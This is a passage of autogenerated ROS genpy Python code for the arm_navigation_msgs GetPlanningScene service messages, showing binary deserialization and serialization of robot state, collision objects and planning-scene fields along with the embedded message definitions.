val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v85 = val1.position
_x = _v85
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v86 = val1.orientation
_x = _v86
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v87 = val1.header
start = end
end += 4
(_v87.seq,) = _struct_I.unpack(str[start:end])
_v88 = _v87.stamp
_x = _v88
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v87.frame_id = str[start:end].decode('utf-8')
else:
_v87.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v89 = val1.transform
_v90 = _v89.translation
_x = _v90
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v91 = _v89.rotation
_x = _v91
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)
val1.enabled = map(bool, val1.enabled)
self.planning_scene_diff.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v92 = val1.shape
start = end
end += 1
(_v92.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v92.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v92.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v92.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v92.vertices.append(val3)
_v93 = val1.pose_stamped
_v94 = _v93.header
start = end
end += 4
(_v94.seq,) = _struct_I.unpack(str[start:end])
_v95 = _v94.stamp
_x = _v95
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v94.frame_id = str[start:end].decode('utf-8')
else:
_v94.frame_id = str[start:end]
_v96 = _v93.pose
_v97 = _v96.position
_x = _v97
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v98 = _v96.orientation
_x = _v98
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v99 = val1.header
start = end
end += 4
(_v99.seq,) = _struct_I.unpack(str[start:end])
_v100 = _v99.stamp
_x = _v100
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v99.frame_id = str[start:end].decode('utf-8')
else:
_v99.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v101 = val1.operation
start = end
end += 1
(_v101.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v102 = val2.position
_x = _v102
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v103 = val2.orientation
_x = _v103
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene_diff.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v104 = val1.object
_v105 = _v104.header
start = end
end += 4
(_v105.seq,) = _struct_I.unpack(str[start:end])
_v106 = _v105.stamp
_x = _v106
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v105.frame_id = str[start:end].decode('utf-8')
else:
_v105.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v104.id = str[start:end].decode('utf-8')
else:
_v104.id = str[start:end]
start = end
end += 4
(_v104.padding,) = _struct_f.unpack(str[start:end])
_v107 = _v104.operation
start = end
end += 1
(_v107.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v104.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v104.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v104.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v108 = val3.position
_x = _v108
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v109 = val3.orientation
_x = _v109
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v104.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene_diff.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v110 = val1.center
_x = _v110
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v111 = val1.extents
_x = _v111
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v112 = val1.axis
_x = _v112
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.operations.collision_operations = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionOperation()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object1 = str[start:end].decode('utf-8')
else:
val1.object1 = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object2 = str[start:end].decode('utf-8')
else:
val1.object2 = str[start:end]
_x = val1
start = end
end += 12
(_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])
self.operations.collision_operations.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
# Shared pre-compiled Struct from genpy used for every uint32 length/count field.
_struct_I = genpy.struct_I
_struct_b = struct.Struct("<b")
_struct_d = struct.Struct("<d")
_struct_f = struct.Struct("<f")
_struct_di = struct.Struct("<di")
_struct_3f = struct.Struct("<3f")
_struct_3I = struct.Struct("<3I")
_struct_4d = struct.Struct("<4d")
_struct_2I = struct.Struct("<2I")
_struct_3d = struct.Struct("<3d")
"""autogenerated by genpy from arm_navigation_msgs/GetPlanningSceneResponse.msg. Do not edit."""
import sys
# True when running under Python 3; the comparison already yields a bool, so
# the redundant "True if ... else False" wrapper is dropped.
python3 = sys.hexversion > 0x03000000
import genpy
import struct
import arm_navigation_msgs.msg
import geometry_msgs.msg
import std_msgs.msg
import genpy
import sensor_msgs.msg
class GetPlanningSceneResponse(genpy.Message):
_md5sum = "285525c9abe002fbafa99af84a14b4cb"
_type = "arm_navigation_msgs/GetPlanningSceneResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
PlanningScene planning_scene
================================================================================
MSG: arm_navigation_msgs/PlanningScene
#full robot state
arm_navigation_msgs/RobotState robot_state
#additional frames for duplicating tf
geometry_msgs/TransformStamped[] fixed_frame_transforms
#full allowed collision matrix
AllowedCollisionMatrix allowed_collision_matrix
#allowed contacts
arm_navigation_msgs/AllowedContactSpecification[] allowed_contacts
#all link paddings
arm_navigation_msgs/LinkPadding[] link_padding
#collision objects
arm_navigation_msgs/CollisionObject[] collision_objects
arm_navigation_msgs/AttachedCollisionObject[] attached_collision_objects
#the collision map
arm_navigation_msgs/CollisionMap collision_map
================================================================================
MSG: arm_navigation_msgs/RobotState
# This message contains information about the robot state, i.e. the positions of its joints and links
sensor_msgs/JointState joint_state
arm_navigation_msgs/MultiDOFJointState multi_dof_joint_state
================================================================================
MSG: sensor_msgs/JointState
# This is a message that holds data to describe the state of a set of torque controlled joints.
#
# The state of each joint (revolute or prismatic) is defined by:
# * the position of the joint (rad or m),
# * the velocity of the joint (rad/s or m/s) and
# * the effort that is applied in the joint (Nm or N).
#
# Each joint is uniquely identified by its name
# The header specifies the time at which the joint states were recorded. All the joint states
# in one message have to be recorded at the same time.
#
# This message consists of a multiple arrays, one for each part of the joint state.
# The goal is to make each of the fields optional. When e.g. your joints have no
# effort associated with them, you can leave the effort array empty.
#
# All arrays in this message should have the same size, or be empty.
# This is the only way to uniquely associate the joint name with the correct
# states.
Header header
string[] name
float64[] position
float64[] velocity
float64[] effort
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.secs: seconds (stamp_secs) since epoch
# * stamp.nsecs: nanoseconds since stamp_secs
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: arm_navigation_msgs/MultiDOFJointState
#A representation of a multi-dof joint state
time stamp
string[] joint_names
string[] frame_ids
string[] child_frame_ids
geometry_msgs/Pose[] poses
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of postion and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: geometry_msgs/TransformStamped
# This expresses a transform from coordinate frame header.frame_id
# to the coordinate frame child_frame_id
#
# This message is mostly used by the
# <a href="http://www.ros.org/wiki/tf">tf</a> package.
# See it's documentation for more information.
Header header
string child_frame_id # the frame id of the child frame
Transform transform
================================================================================
MSG: geometry_msgs/Transform
# This represents the transform between two coordinate frames in free space.
Vector3 translation
Quaternion rotation
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
float64 x
float64 y
float64 z
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionMatrix
# the list of link names in the matrix
string[] link_names
# the individual entries in the allowed collision matrix
# symmetric, with same order as link_names
AllowedCollisionEntry[] entries
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionEntry
# whether or not collision checking is enabled
bool[] enabled
================================================================================
MSG: arm_navigation_msgs/AllowedContactSpecification
# The names of the regions
string name
# The shape of the region in the environment
arm_navigation_msgs/Shape shape
# The pose of the space defining the region
geometry_msgs/PoseStamped pose_stamped
# The set of links that will be allowed to have penetration contact within this region
string[] link_names
# The maximum penetration depth allowed for every link
float64 penetration_depth
================================================================================
MSG: arm_navigation_msgs/Shape
byte SPHERE=0
byte BOX=1
byte CYLINDER=2
byte MESH=3
byte type
#### define sphere, box, cylinder ####
# the origin of each shape is considered at the shape's center
# for sphere
# radius := dimensions[0]
# for cylinder
# radius := dimensions[0]
# length := dimensions[1]
# the length is along the Z axis
# for box
# size_x := dimensions[0]
# size_y := dimensions[1]
# size_z := dimensions[2]
float64[] dimensions
#### define mesh ####
# list of triangles; triangle k is defined by tre vertices located
# at indices triangles[3k], triangles[3k+1], triangles[3k+2]
int32[] triangles
geometry_msgs/Point[] vertices
================================================================================
MSG: geometry_msgs/PoseStamped
# A Pose with reference coordinate frame and timestamp
Header header
Pose pose
================================================================================
MSG: arm_navigation_msgs/LinkPadding
#name for the link
string link_name
# padding to apply to the link
float64 padding
================================================================================
MSG: arm_navigation_msgs/CollisionObject
# a header, used for interpreting the poses
Header header
# the id of the object
string id
# The padding used for filtering points near the object.
# This does not affect collision checking for the object.
# Set to negative to get zero padding.
float32 padding
#This contains what is to be done with the object
CollisionObjectOperation operation
#the shapes associated with the object
arm_navigation_msgs/Shape[] shapes
#the poses associated with the shapes - will be transformed using the header
geometry_msgs/Pose[] poses
================================================================================
MSG: arm_navigation_msgs/CollisionObjectOperation
#Puts the object into the environment
#or updates the object if already added
byte ADD=0
#Removes the object from the environment entirely
byte REMOVE=1
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes an attached object, detaches from the attached link
#But adds back in as regular object
byte DETACH_AND_ADD_AS_OBJECT=2
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes current object in the environment and removes it as
#a regular object
byte ATTACH_AND_REMOVE_AS_OBJECT=3
# Byte code for operation
byte operation
================================================================================
MSG: arm_navigation_msgs/AttachedCollisionObject
# The CollisionObject will be attached with a fixed joint to this link
# If link name is set to REMOVE_ALL_ATTACHED_OBJECTS and object.operation
# is set to REMOVE will remove all attached bodies attached to any object
string link_name
#Reserved for indicating that all attached objects should be removed
string REMOVE_ALL_ATTACHED_OBJECTS = "all"
#This contains the actual shapes and poses for the CollisionObject
#to be attached to the link
#If action is remove and no object.id is set, all objects
#attached to the link indicated by link_name will be removed
CollisionObject object
# The set of links that the attached objects are allowed to touch
# by default - the link_name is included by default
string[] touch_links
================================================================================
MSG: arm_navigation_msgs/CollisionMap
#header for interpreting box positions
Header header
#boxes for use in collision testing
OrientedBoundingBox[] boxes
================================================================================
MSG: arm_navigation_msgs/OrientedBoundingBox
#the center of the box
geometry_msgs/Point32 center
#the extents of the box, assuming the center is at the point
geometry_msgs/Point32 extents
#the axis of the box
geometry_msgs/Point32 axis
#the angle of rotation around the axis
float32 angle
================================================================================
MSG: geometry_msgs/Point32
# This contains the position of a point in free space(with 32 bits of precision).
# It is recommeded to use Point wherever possible instead of Point32.
#
# This recommendation is to promote interoperability.
#
# This message is designed to take up less space when sending
# lots of points at once, as in the case of a PointCloud.
float32 x
float32 y
float32 z
"""
__slots__ = ['planning_scene']
_slot_types = ['arm_navigation_msgs/PlanningScene']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
planning_scene
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlanningSceneResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.planning_scene is None:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
else:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
  def serialize(self, buff):
    """
    serialize message into buffer

    Writes ``self.planning_scene`` to *buff* in little-endian ROS wire
    format: fixed-size fields via precompiled ``_struct_*`` packers,
    variable-length arrays and strings as a uint32 length prefix followed
    by the payload.  Strings are UTF-8 encoded on Python 3 (or for
    ``unicode`` values on Python 2).

    :param buff: buffer, ``StringIO``
    """
    try:
      # --- robot_state.joint_state (header, names, position/velocity/effort) ---
      _x = self
      buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))
      _x = self.planning_scene.robot_state.joint_state.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.planning_scene.robot_state.joint_state.name)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.robot_state.joint_state.name:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene.robot_state.joint_state.position)
      buff.write(_struct_I.pack(length))
      pattern = '<%sd'%length
      buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.position))
      length = len(self.planning_scene.robot_state.joint_state.velocity)
      buff.write(_struct_I.pack(length))
      pattern = '<%sd'%length
      buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.velocity))
      length = len(self.planning_scene.robot_state.joint_state.effort)
      buff.write(_struct_I.pack(length))
      pattern = '<%sd'%length
      buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.effort))
      # --- robot_state.multi_dof_joint_state ---
      _x = self
      buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))
      length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:
        _v113 = val1.position
        _x = _v113
        buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v114 = val1.orientation
        _x = _v114
        buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
      # --- fixed_frame_transforms (geometry_msgs/TransformStamped[]) ---
      length = len(self.planning_scene.fixed_frame_transforms)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.fixed_frame_transforms:
        _v115 = val1.header
        buff.write(_struct_I.pack(_v115.seq))
        _v116 = _v115.stamp
        _x = _v116
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v115.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = val1.child_frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v117 = val1.transform
        _v118 = _v117.translation
        _x = _v118
        buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v119 = _v117.rotation
        _x = _v119
        buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
      # --- allowed_collision_matrix (link names + boolean entry rows) ---
      length = len(self.planning_scene.allowed_collision_matrix.link_names)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.allowed_collision_matrix.link_names:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene.allowed_collision_matrix.entries)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.allowed_collision_matrix.entries:
        length = len(val1.enabled)
        buff.write(_struct_I.pack(length))
        pattern = '<%sB'%length
        buff.write(struct.pack(pattern, *val1.enabled))
      # --- allowed_contacts (AllowedContactSpecification[]) ---
      length = len(self.planning_scene.allowed_contacts)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.allowed_contacts:
        _x = val1.name
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v120 = val1.shape
        buff.write(_struct_b.pack(_v120.type))
        length = len(_v120.dimensions)
        buff.write(_struct_I.pack(length))
        pattern = '<%sd'%length
        buff.write(struct.pack(pattern, *_v120.dimensions))
        length = len(_v120.triangles)
        buff.write(_struct_I.pack(length))
        pattern = '<%si'%length
        buff.write(struct.pack(pattern, *_v120.triangles))
        length = len(_v120.vertices)
        buff.write(_struct_I.pack(length))
        for val3 in _v120.vertices:
          _x = val3
          buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v121 = val1.pose_stamped
        _v122 = _v121.header
        buff.write(_struct_I.pack(_v122.seq))
        _v123 = _v122.stamp
        _x = _v123
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v122.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v124 = _v121.pose
        _v125 = _v124.position
        _x = _v125
        buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v126 = _v124.orientation
        _x = _v126
        buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
        length = len(val1.link_names)
        buff.write(_struct_I.pack(length))
        for val2 in val1.link_names:
          length = len(val2)
          if python3 or type(val2) == unicode:
            val2 = val2.encode('utf-8')
            length = len(val2)
          buff.write(struct.pack('<I%ss'%length, length, val2))
        buff.write(_struct_d.pack(val1.penetration_depth))
      # --- link_padding (LinkPadding[]) ---
      length = len(self.planning_scene.link_padding)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.link_padding:
        _x = val1.link_name
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        buff.write(_struct_d.pack(val1.padding))
      # --- collision_objects (CollisionObject[]) ---
      length = len(self.planning_scene.collision_objects)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.collision_objects:
        _v127 = val1.header
        buff.write(_struct_I.pack(_v127.seq))
        _v128 = _v127.stamp
        _x = _v128
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v127.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = val1.id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        buff.write(_struct_f.pack(val1.padding))
        _v129 = val1.operation
        buff.write(_struct_b.pack(_v129.operation))
        length = len(val1.shapes)
        buff.write(_struct_I.pack(length))
        for val2 in val1.shapes:
          buff.write(_struct_b.pack(val2.type))
          length = len(val2.dimensions)
          buff.write(_struct_I.pack(length))
          pattern = '<%sd'%length
          buff.write(struct.pack(pattern, *val2.dimensions))
          length = len(val2.triangles)
          buff.write(_struct_I.pack(length))
          pattern = '<%si'%length
          buff.write(struct.pack(pattern, *val2.triangles))
          length = len(val2.vertices)
          buff.write(_struct_I.pack(length))
          for val3 in val2.vertices:
            _x = val3
            buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        length = len(val1.poses)
        buff.write(_struct_I.pack(length))
